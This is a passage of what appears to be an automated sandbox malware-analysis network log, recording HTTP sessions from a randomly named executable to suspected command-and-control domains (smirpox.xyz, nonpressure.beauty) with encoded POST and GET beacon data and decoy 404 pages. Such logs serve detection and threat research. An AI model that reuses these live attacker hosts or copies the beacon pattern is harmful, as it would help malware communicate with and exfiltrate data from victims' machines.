                                                                    Data Ascii: 7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7
                                                                    Nov 12, 2024 18:49:48.868645906 CET848INData Raw: 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 30 2e 35 22 20 63 79 3d 22 38 30 37
                                                                    Data Ascii: 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3
                                                                    Nov 12, 2024 18:49:48.868658066 CET1236INData Raw: 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72
                                                                    Data Ascii: 2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rota
                                                                    Nov 12, 2024 18:49:48.868669987 CET1236INData Raw: 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 30 39 2e 32 22 20 63 79 3d 22 37 30 31 2e 33 22 20 72 3d 22 33 2e 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34
                                                                    Data Ascii: "/> <circle cx="609.2" cy="701.3" r="3.6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"
                                                                    Nov 12, 2024 18:49:48.868683100 CET424INData Raw: 22 20 63 79 3d 22 37 33 30 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 30 2e 36 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c
                                                                    Data Ascii: " cy="730.7" r="3.7" transform="translate(-270.6 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4"
                                                                    Nov 12, 2024 18:49:48.869458914 CET1236INData Raw: 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 39 31 2e 34 22 20 63 79 3d 22 36 39 31 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61
                                                                    Data Ascii: -27.1)" style="fill: #ffe029"/> <circle cx="591.4" cy="691.3" r="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-
                                                                    Nov 12, 2024 18:49:48.869468927 CET212INData Raw: 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 33 2e 37 22 20 63 79 3d 22 37 32 35 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 32 20 33 32 33
                                                                    Data Ascii: 29"/> <circle cx="533.7" cy="725.5" r="3.7" transform="translate(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(
                                                                    Nov 12, 2024 18:49:48.873123884 CET1236INData Raw: 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 34 31 2e 31 22 20 63 79 3d 22 36 39 32 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61
                                                                    Data Ascii: -27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-256.4 322.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="556.3" cy="703.9" r="3.7" transform="translate(-259.7 330.9) rotate(-


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.450033203.161.46.201804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:50.743695974 CET10896OUTPOST /qnzs/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.smirpox.xyz
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 10301
                                                                    Connection: close
                                                                    Origin: http://www.smirpox.xyz
                                                                    Referer: http://www.smirpox.xyz/qnzs/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 4c 7a 4d 6a 45 67 4d 66 78 4c 5a 58 57 74 62 32 46 64 2b 64 46 58 42 47 70 36 62 2b 54 4f 45 59 4a 4c 31 61 6d 34 47 70 6d 77 6c 33 56 51 4e 50 57 63 53 4f 57 71 65 35 54 32 61 64 53 47 53 77 6b 6d 53 48 78 46 35 55 35 38 49 59 6e 6c 76 67 4f 56 33 2b 6b 78 30 42 49 4f 5a 6f 2b 2f 56 70 6b 78 61 57 64 54 66 62 71 66 56 50 52 4a 6d 65 79 42 63 72 51 35 53 58 43 48 78 50 46 48 4e 4e 69 58 62 5a 58 55 38 67 63 6f 74 35 47 65 75 62 4e 32 64 4b 38 79 34 46 78 47 69 59 68 6b 77 5a 49 77 34 70 53 2f 7a 41 6c 50 47 50 67 57 6e 73 50 77 74 33 34 6e 4e 49 55 4a 45 43 4a 76 65 65 5a 78 6c 6a 6b 61 56 67 4b 79 61 66 6d 79 31 36 31 74 70 4f 75 42 61 6f 2f 41 31 58 56 36 55 64 6b 61 79 4c 77 30 6b 55 67 6d 62 36 6d 55 50 68 34 50 45 43 55 6f 6e 69 65 6d 52 6f 6c 51 43 6c 74 53 75 73 69 54 72 4d 55 56 34 44 35 4c 50 77 69 36 7a 47 6b 31 63 37 44 74 39 6a 56 47 53 71 64 76 38 47 58 56 69 73 76 6f 6d 49 52 6d 4d 62 33 61 77 65 6b 64 65 6d 56 49 32 38 56 72 4d 57 55 7a 36 50 61 2b 67 4a 7a 49 73 67 5a [TRUNCATED]
                                                                    Data Ascii: C0oD=LzMjEgMfxLZXWtb2Fd+dFXBGp6b+TOEYJL1am4Gpmwl3VQNPWcSOWqe5T2adSGSwkmSHxF5U58IYnlvgOV3+kx0BIOZo+/VpkxaWdTfbqfVPRJmeyBcrQ5SXCHxPFHNNiXbZXU8gcot5GeubN2dK8y4FxGiYhkwZIw4pS/zAlPGPgWnsPwt34nNIUJECJveeZxljkaVgKyafmy161tpOuBao/A1XV6UdkayLw0kUgmb6mUPh4PECUoniemRolQCltSusiTrMUV4D5LPwi6zGk1c7Dt9jVGSqdv8GXVisvomIRmMb3awekdemVI28VrMWUz6Pa+gJzIsgZgKUST8mICB8jxQA7HLOEmhkkwZL/I1ToJVT9yAQba0VuzyUgwpKCs76lM2n5kiqXVqhv8LbYfpujs5UK8DdP1xRNREmDfcW9+QcvnZ4ApjYza3P4pVjlXakjB05rD9BzTqFEU+9AeG3fRVvTJehB4XyL3SmU4qpAcIxh1wApRcHISECNaf9eBs1xp67VsuYdG3yCetu4IgofE6dHEpMHholuxxlzynALSXEM4WnIKtzKxPATr2TMHcJMSfwQXFmUsyYwtQ6Uqg7BAjU4bHZarFFbj+EM7oJCKSHKM5wTzdTmBVQH2EaU/IyJ0u3/cJ0PmDZ8lyM34zf6iT9ixcF9FpzgLr1FDixN5ND7WT4X3EhYgi6/nUUXPy+GTlTLuFhZgjKAug87ByEvCdwJwMOtnQMDC1jX7lzeDPhnym9Ig+cizdRiScu4PV2V6nrvNLoPJ11+Q09kcQevTQ8l4pxjbuA5kAuw3on6pfiyPcjR3/pHveMu4rLzhHA95RsgZ4NtU0PGfiUFlGl+cTcaekpARJdUmNtxXDHRcwOaiGq/20/2kZDlLE1MDaW5dULkr8R8D1tuD77I5+V4V9HZfLLdQ3YMMJJZBsmCB27Tuqe9XEE3ZacSP2wsPQoxfw/GJD/Rfv4ZL0aWGKFlnrZsYpklSe/XStkape1IQ8 [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.450034203.161.46.201804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:53.285903931 CET537OUTGET /qnzs/?C0oD=GxkDHWsX54BcXdr+X4+GX30U3Lj5RtBkEtwzkqjSlwd5bhdVdKj3SOXRTkGfTnWing/dpWlHheQGrgb9DnLsoxo3QIxkxehw/T2sZhHOm+tURauy0yxjdNs=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Host: www.smirpox.xyz
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Nov 12, 2024 18:49:54.144273996 CET1236INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:49:54 GMT
                                                                    Server: Apache
                                                                    Content-Length: 38381
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                                                                    Nov 12, 2024 18:49:54.144323111 CET1236INData Raw: 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38
                                                                    Data Ascii: 98.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 29
                                                                    Nov 12, 2024 18:49:54.144337893 CET1236INData Raw: 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e
                                                                    Data Ascii: fe029"/> <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ff
                                                                    Nov 12, 2024 18:49:54.144751072 CET636INData Raw: 20 63 79 3d 22 37 38 34 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23
                                                                    Data Ascii: cy="784" r="3.7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy
                                                                    Nov 12, 2024 18:49:54.144864082 CET1236INData Raw: 73 6c 61 74 65 28 2d 32 39 39 2e 38 20 33 33 32 2e 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 34
                                                                    Data Ascii: slate(-299.8 332.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.8" cy="770.3" r="3.7" transform="translate(-291.5 331.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="559.9" cy="763.5" r="3.7" transform="trans
                                                                    Nov 12, 2024 18:49:54.144875050 CET212INData Raw: 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 31 32 2e 34 22 20 63 79 3d 22 37 36 35 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66
                                                                    Data Ascii: .1)" style="fill: #ffe029"/> <circle cx="612.4" cy="765.8" r="3.7" transform="translate(-281.7 363.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="627.4" cy="776" r="3.7" transform="transl
                                                                    Nov 12, 2024 18:49:54.145157099 CET1236INData Raw: 61 74 65 28 2d 32 38 34 2e 37 20 33 37 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e
                                                                    Data Ascii: ate(-284.7 371.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate
                                                                    Nov 12, 2024 18:49:54.145168066 CET212INData Raw: 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 30 39 2e 32 22 20 63 79 3d 22 37 30 31 2e 33 22 20 72 3d 22 33 2e 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73
                                                                    Data Ascii: ="fill: #ffe029"/> <circle cx="609.2" cy="701.3" r="3.6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260
                                                                    Nov 12, 2024 18:49:54.145179033 CET1236INData Raw: 2e 36 20 33 35 35 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 31 35 2e 37 22 20 63 79 3d 22 37
                                                                    Data Ascii: .6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7" transform="translate(-273.1 362.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="602.2" cy="735.1" r="3.7" transform="translate(-268.
                                                                    Nov 12, 2024 18:49:54.145193100 CET1236INData Raw: 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 38 37 2e 34 22 20 63 79 3d 22 37 32 34 2e 36 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73
                                                                    Data Ascii: ="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7 347.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590.7" cy="708.2" r="3.7" transform="translate(-257.8 347) rotate(-27.1)" style="f
                                                                    Nov 12, 2024 18:49:54.149571896 CET1236INData Raw: 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 32 32 2e 32 22 20 63 79 3d 22 36 39 37 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 30 2e 34 20 33 31 34 2e 36 29 20 72 6f 74 61 74 65 28 2d 32
                                                                    Data Ascii: <circle cx="522.2" cy="697.3" r="3.7" transform="translate(-260.4 314.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="518.7" cy="713.5" r="3.7" transform="translate(-268.2 314.8) rotate(-27.1)" style="fill: #ffe029"/> <


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.450035104.21.4.93804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:59.458235979 CET815OUTPOST /naci/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.nonpressure.beauty
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 201
                                                                    Connection: close
                                                                    Origin: http://www.nonpressure.beauty
                                                                    Referer: http://www.nonpressure.beauty/naci/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 57 79 4d 4f 39 45 6e 47 45 4b 48 51 37 71 70 6c 44 51 33 2b 47 4f 41 46 32 6f 63 5a 55 32 2f 42 6d 46 48 54 69 51 52 68 35 6a 68 58 59 30 2f 69 4e 6a 66 55 4f 34 54 66 43 41 65 43 74 6e 47 4f 36 4c 4e 71 5a 67 6f 4b 44 64 64 37 42 70 51 78 49 30 32 55 39 6c 56 70 31 6e 32 37 44 50 48 71 4f 53 35 33 31 49 6e 62 66 50 48 2f 63 4f 50 35 35 63 4b 38 50 43 70 71 47 7a 67 34 73 76 4e 75 56 6b 53 6f 54 32 45 32 6d 2f 75 39 75 47 4e 70 6c 65 7a 58 48 7a 4e 37 2f 59 43 48 64 57 65 38 31 41 35 4e 6e 6b 59 78 48 2f 79 48 43 6a 6f 64 55 64 72 6f 5a 7a 5a 4f 4d 37 65 65 38 46 31 44 6b 77 3d 3d
                                                                    Data Ascii: C0oD=WyMO9EnGEKHQ7qplDQ3+GOAF2ocZU2/BmFHTiQRh5jhXY0/iNjfUO4TfCAeCtnGO6LNqZgoKDdd7BpQxI02U9lVp1n27DPHqOS531InbfPH/cOP55cK8PCpqGzg4svNuVkSoT2E2m/u9uGNplezXHzN7/YCHdWe81A5NnkYxH/yHCjodUdroZzZOM7ee8F1Dkw==
                                                                    Nov 12, 2024 18:50:00.376020908 CET675INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:50:00 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                    Expires: Tue, 12 Nov 2024 17:50:00 GMT
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e185ca1fc2b7b20-DEN
                                                                    Content-Encoding: gzip
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=19001&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.450036104.21.4.93804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:50:02.005187988 CET835OUTPOST /naci/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.nonpressure.beauty
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 221
                                                                    Connection: close
                                                                    Origin: http://www.nonpressure.beauty
                                                                    Referer: http://www.nonpressure.beauty/naci/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 57 79 4d 4f 39 45 6e 47 45 4b 48 51 36 4a 78 6c 42 78 33 2b 4f 4f 41 45 71 34 63 5a 4f 47 2b 49 6d 46 4c 54 69 55 67 73 35 56 78 58 59 55 76 69 4d 69 66 55 65 6f 54 66 4d 67 66 49 67 48 48 43 36 4c 41 58 5a 68 55 4b 44 64 4a 37 42 72 34 78 4a 44 71 62 73 6c 56 6e 74 58 32 35 48 50 48 71 4f 53 35 33 31 49 69 30 66 50 50 2f 63 2b 2f 35 34 39 4b 2f 52 53 70 74 4f 54 67 34 6f 76 4e 71 56 6b 53 61 54 33 59 63 6d 38 57 39 75 45 6c 70 72 73 4c 59 4a 44 4e 35 37 59 44 59 4e 6c 37 73 78 53 59 78 2f 48 41 77 4e 75 6e 72 4f 46 6c 48 46 73 4b 2f 4c 7a 39 39 52 38 58 71 78 47 49 4b 2f 36 52 4d 32 4d 61 36 6b 4e 39 37 4f 68 45 61 52 47 43 55 78 73 59 3d
                                                                    Data Ascii: C0oD=WyMO9EnGEKHQ6JxlBx3+OOAEq4cZOG+ImFLTiUgs5VxXYUviMifUeoTfMgfIgHHC6LAXZhUKDdJ7Br4xJDqbslVntX25HPHqOS531Ii0fPP/c+/549K/RSptOTg4ovNqVkSaT3Ycm8W9uElprsLYJDN57YDYNl7sxSYx/HAwNunrOFlHFsK/Lz99R8XqxGIK/6RM2Ma6kN97OhEaRGCUxsY=
                                                                    Nov 12, 2024 18:50:02.924303055 CET675INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:50:02 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                    Expires: Tue, 12 Nov 2024 17:50:02 GMT
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e185cb1dbdbe807-DFW
                                                                    Content-Encoding: gzip
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2634&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=835&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.450037104.21.4.93804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:50:04.555982113 CET10917OUTPOST /naci/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
